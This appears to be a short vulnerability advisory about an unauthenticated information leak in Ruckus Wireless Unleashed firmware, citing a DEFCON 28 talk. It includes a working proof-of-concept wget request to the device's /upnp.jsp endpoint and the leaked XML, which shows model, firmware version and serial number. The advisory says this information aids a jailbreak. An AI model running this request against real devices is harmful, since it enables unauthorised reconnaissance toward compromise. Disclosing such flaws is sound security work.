Incorrect access control in webs in Ruckus Wireless Unleashed through 200.7.10.102.92 allows a remote attacker to leak system information (that can be used for a jailbreak) via an unauthenticated crafted HTTP request.
Information about the exploitation of this vulnerability can alos be found in our DEFCON 28 talk.
➜ ~ wget -q -O - 192.168.0.1/upnp.jsp
<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<URLBase>http://192.168.0.1/</URLBase>
<device>
<deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
<friendlyName>Ruckus-Unleashed 192.168.0.1</friendlyName>
<manufacturer>Ruckus Wireless</manufacturer>
<manufacturerURL>http://www.ruckuswireless.com</manufacturerURL>
<modelDescription>Ruckus Wireless Unleashed</modelDescription>
<modelName>R510</modelName>
<modelNumber>200.7.10.202</modelNumber>
<modelURL>http://www.ruckuswireless.com/</modelURL>
<serialNumber>161902007765</serialNumber>
<UDN>uuid:edb18e23-06c3-42ff-8c6d-</UDN>
<UPC>unknown</UPC>
<iconList>
<icon>
<mimetype>image/gif</mimetype>
<width>32</width>
<height>32</height>
<depth>8</depth>
<url>/images/upnp.gif</url>
</icon>
</iconList>
<serviceList>
<service>
<serviceType>urn:schemas-upnp-org:service:WirelessSwitch:1</serviceType>
<serviceId>urn:upnp-org:serviceId:Basic1</serviceId>
<controlURL>/upnp/control/Basic1</controlURL>
<eventSubURL>/upnp/event/Basic1</eventSubURL>
<SCPDURL>/BasicSCPD.xml</SCPDURL>
</service>
</serviceList>
<presentationURL>https://192.168.0.1/</presentationURL>
</device>
</root>